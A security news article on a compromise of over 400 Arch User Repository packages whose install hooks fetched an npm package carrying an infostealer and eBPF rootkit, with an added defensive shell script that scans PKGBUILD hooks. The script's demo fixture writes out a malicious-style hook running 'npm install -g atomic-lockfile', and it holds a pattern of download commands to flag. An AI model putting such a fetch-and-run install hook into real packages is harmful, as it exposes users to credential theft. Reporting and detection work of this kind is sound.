Malware Exploits Arch Linux Packages to Spread Rootkit, Infostealer

More than 400 packages in the Arch User Repository (AUR) were discovered distributing a Linux rootkit and an infostealer, according to reporting and research shared this week.

Scale and vector: AUR packages altered to fetch malicious code

The compromise affected over 400 packages hosted in the AUR, a community-maintained catalog of package build scripts (PKGBUILDs) used by Arch Linux and Arch-based distributions to supply software not in the official repositories. Independent Federated Intelligence Network (IFIN) member Michael Taggart reported that a new maintainer account was spoofing a trusted publisher on AUR and that the compromised packages were modified with preinstall scripts that download and execute an npm package called atomic-lockfile.

AUR’s role — providing proprietary applications, beta/nightly releases, niche utilities and older package versions — makes it essential to many users. But that same openness means ownership changes can go unnoticed, creating an opportunity for threat actors to push malware via modified PKGBUILDs and install scripts.

atomic-lockfile: the npm package at the center

Independent security researcher Whanos examined one sample of atomic-lockfile and found it included a Linux ELF payload named deps. Whanos described that payload as a "credential stealer with optional root-only eBPF [extended Berkeley Packet Filter] rootkit capabilities." Sonatype, a supply-chain management company, independently published analysis tying atomic-lockfile to the AUR campaign; Sonatype said attackers added a post-install script to the PKGBUILD to invoke npm and retrieve the malicious package.

eBPF rootkit and infostealer capabilities explained

Analysts describe the deployed binary as combining two dangerous features: an infostealer and an eBPF-based rootkit. When run as root on a host where eBPF is available, the payload can load programs into the kernel and use them to hide local processes, files, and network interfaces. Whanos characterized the toolset as "designed for developer workstations and build environments."

Whanos lists the types of data targeted: "browser and Electron application data, Slack, Microsoft Teams, Discord, GitHub, npm, Vault, Docker/Podman, SSH, VPN material, shell histories, and other local developer secrets." Sonatype’s analysis complements that view, finding the Linux binary contains infostealer functionality that targets GitHub credentials, SSH artifacts, HashiCorp Vault tokens, browser cookie databases, Slack, Discord, Microsoft Teams and Telegram data. Sonatype also observed that the binary can archive data, handle multi-part files, and perform HTTP uploads — the components needed for exfiltration.

Attacker technique: hijacked orphaned packages and modified PKGBUILDs

Sonatype’s researchers reported that the actor hijacked at least 20 orphaned AUR packages — packages without an active maintainer — and modified their PKGBUILD files to include a post-install script that invoked npm to install atomic-lockfile during package installation. IFIN and Sonatype describe parallel findings: the attacker added script hooks to build/install workflows so that ordinary package installation would retrieve the malicious npm artifact.

The method leverages the way AUR PKGBUILDs are written: they are Bash scripts that instruct Arch’s package tools how to download, compile and install software, and their pre- and post-install hooks are Bash as well. By injecting post-install or preinstall commands, an attacker can execute arbitrary code on the target machine at package installation time, with the privileges of the package manager, which runs as root.
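As an added example (not code from the article, nor from IFIN, Sonatype or Whanos), the following POSIX shell triage helper flags PKGBUILD and .install lines whose hooks invoke package or download tools, and checks whether an npm package named atomic-lockfile already sits under given directories. The suspect-command list, the sample files and the directory layout are constructed assumptions for illustration.

```shell
#!/bin/sh
# Added example, not code from the article or the researchers it cites.
# Triage aid for AUR packages before building them: the campaign hid
# "npm install atomic-lockfile" in PKGBUILD install hooks, so this flags
# PKGBUILD/.install lines that fetch remote code and looks for the npm
# artifact on the host. Expect false positives on legitimate Node packages.

# Command words that a pre/post-install hook should not need to run (constructed list).
SUSPECT_RE='(^|[^[:alnum:]_.-])(npm|npx|pip3?|curl|wget)[[:space:]]'

# scan_install_hooks DIR: print FILE:LINE:TEXT for each non-comment suspect
# line in DIR/PKGBUILD and DIR/*.install; return 0 if clean, 1 if anything hit.
scan_install_hooks() {
    hits=0
    for f in "$1"/PKGBUILD "$1"/*.install; do
        [ -f "$f" ] || continue
        # grep -n prefixes "N:"; the second grep drops commented-out lines
        matches=$(grep -nE "$SUSPECT_RE" "$f" | grep -vE '^[0-9]+:[[:space:]]*#')
        if [ -n "$matches" ]; then
            printf '%s\n' "$matches" | while IFS= read -r l; do printf '%s:%s\n' "$f" "$l"; done
            hits=1
        fi
    done
    return $hits
}

# find_npm_artifact NAME ROOT...: print every node_modules/NAME directory under
# the given roots (e.g. /usr/lib, ~/.local/lib, ~/.npm); return 0 if any found.
find_npm_artifact() {
    name=$1; shift
    found=$(find "$@" -type d -path "*/node_modules/$name" 2>/dev/null)
    [ -n "$found" ] && printf '%s\n' "$found"
    [ -n "$found" ]
}

# Constructed demo: one tainted package directory, one clean one, one fake home.
demo=$(mktemp -d)
mkdir -p "$demo/tainted" "$demo/clean" "$demo/home/.local/lib/node_modules/atomic-lockfile"
cat > "$demo/tainted/example.install" <<'EOF'
post_install() {
    # a real hook would only refresh caches; this one pulls a remote package
    npm install -g atomic-lockfile >/dev/null 2>&1 || true
}
EOF
printf 'pkgname=clean\npkgver=1.0\nsource=("https://example.invalid/clean.tar.gz")\n' > "$demo/clean/PKGBUILD"
scan_install_hooks "$demo/tainted" || echo "tainted: review the hook above before building"
scan_install_hooks "$demo/clean" && echo "clean: no suspect hook lines"
find_npm_artifact atomic-lockfile "$demo/home" && echo "artifact present: rotate credentials, rebuild host"
rm -rf "$demo"
```

Run it against a checked-out AUR package directory and against the npm global and per-user module paths on a workstation; a hit is a reason to read the hook by hand, not proof of compromise.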

Arch maintainers, user guidance, and remediation steps

AUR maintainers are actively working to identify and remove malicious commits and ban the accounts that pushed them. Arch Linux package maintainer Jonathan Grotelüschen urged users to report any malicious package they find. Michael Taggart also pointed users to a script that checks for the atomic-lockfile malware on a system.

Analysts advise that users review the list of affected packages and the indicators of compromise provided by researchers such as Whanos. If a system is found to contain a compromised package, the guidance in the reporting is explicit: rotate all credentials and consider reinstalling Arch from scratch, because a rootkit may survive standard cleaning efforts.

That prescription highlights the central risk here: a community-maintained repository can speed distribution of useful software while also enabling supply-chain abuse if account ownership and build scripts are not tightly monitored. For Arch users and maintainers, the immediate tasks are removal, credential rotation and deeper host validation; for organizations that rely on developer workstations, the episode underscores the need to treat package sources and build-time scripts as high-risk attack surfaces.

https://www.bleepingcomputer.com/news/security/over-400-arch-linux-packages-compromised-to-push-rootkit-infostealer/